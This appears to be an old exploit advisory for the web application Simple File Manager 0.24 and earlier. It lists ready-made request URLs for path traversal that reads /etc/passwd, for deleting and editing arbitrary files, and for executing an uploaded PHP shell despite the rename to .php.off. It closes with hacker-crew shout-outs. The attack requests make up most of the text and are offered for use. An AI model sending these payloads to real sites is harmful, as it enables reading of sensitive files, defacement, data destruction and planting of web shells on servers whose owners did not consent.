/*******************************************\
| flame vrs Simple File Manager <=0.24=> |
| http://onedotoh.sourceforge.net/ |
| Various Vulnerbilities Including: |
\*******************************************/
/+++++++++++++++++++++++++++++++++++++++++++\
| Using the scripts supplied by the webapp: |
| Reading of Arbitrary files |
| Deletion of Arbitrary files |
| Modification of Arbitrary files |
| Creation of Arbitrary files |
| Uploading of Malicious files |
\+++++++++++++++++++++++++++++++++++++++++++/
/&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&\
| Simple File Manager (SFM) is a web based |
| file management utility. |
| It is designed to be used by those that |
| don't want to use ftp or SHOULD NOT use |
| ftp. It can be dropped into a specific |
| directory and give access to that |
| directory as well as any directory below |
| it, including those created by SFM. It |
| can be placed in a specific directory and |
| configured to give access to other |
| directories outside of its location |
| (centralized). SFM gives its user upload, |
| rename, delete, directory creation as |
| well as directory navigation (within its |
| tree limits), as well as Create New File; |
| it also includes an image viewer, text |
| viewer and mime type downloading. |
\&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&/
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ |
| Thats the description from the author...|
| Which basically outlines all of its |
| vulnerbilities. |
\_________________________________________/
/=========================================================================================================================\
############################ .:Reading of Arbitrary Files:. ###############################################################
# fm.php?action=download&filename=[RELATIVE PATH / FILENAME]&pathext=&u=&&copt=1&sortKey=2 #
# EG: http://www.site.com/file/fm.php?action=download&filename=../../../../../../etc/passwd&pathext=&u=&&copt=1&sortKey=2 #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################ .:Deletion of Arbirary Files:. ###############################################################
# fm.php?delete=[RELATIVE PATH / FILENAME]&copt=1&sortKey=2&u=&pathext= #
# EG: http://www.site.com/file/fm.php?delete=phpshell.php&copt=1&sortKey=2&u=&pathext= #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################# .:Modification of Arbitrary Files:. #########################################################
# fm.php?edit=[RELATEIVE PATH / FILENAME]&u=&copt=1&pathext= #
# EG: http://www.site.com/file/fm.php?edit=../index.php&u=&copt=1&pathext= #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################# .:Creation of Arbitrary Files:. #############################################################
# START LOCAL HTML FILE: #
# END LOCAL HTML FILE #
###########################################################################################################################
# Note... various characters are escaped. And by default all .php files will be renamed to file.php.off #
# Note... The author decided to let you change the fm.php file anyway (*See Modification of Arbitrary files) #
###########################################################################################################################
\=========================================================================================================================/
/=========================================================================================================================\
############################## .: Uploading of Malicious Files:. ##########################################################
# START LOCAL HTML FILE: #
# END LOCAL HTML FILE #
###########################################################################################################################
# Note... By default all .php files will be renamed to file.php.off, you can usually just browse to the file anyway and it#
# will execute... EG: http://www.site.com/file/phpshell.php.off #
###########################################################################################################################
\=========================================================================================================================/
/++++++++++++++++++++++++++++\
| Be good, and dont be too |
| hopeful about finding |
| yourself a gibbon running |
| this script. It predates |
| my #999999 hair. |
\++++++++++++++++++++++++++++/
/{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}\
|---------------------------------------|
| <&bk> stfu flame |
| <~PhaZe_One> no fame without flame |
| <+c|p> I love you flame |
| <%emc2> flame wishes death upon you |
| are you emo flame? |
| <&[myg0t]40> flame dont be mad |
| *~str0ke humps flame's leg |
| <&ZoNe_VoRTeX> <3 flame |
|---------------------------------------|
\{S}{H}{O}{U}{T}{-}{O}{U}{T}{S}{!}{!}{!}/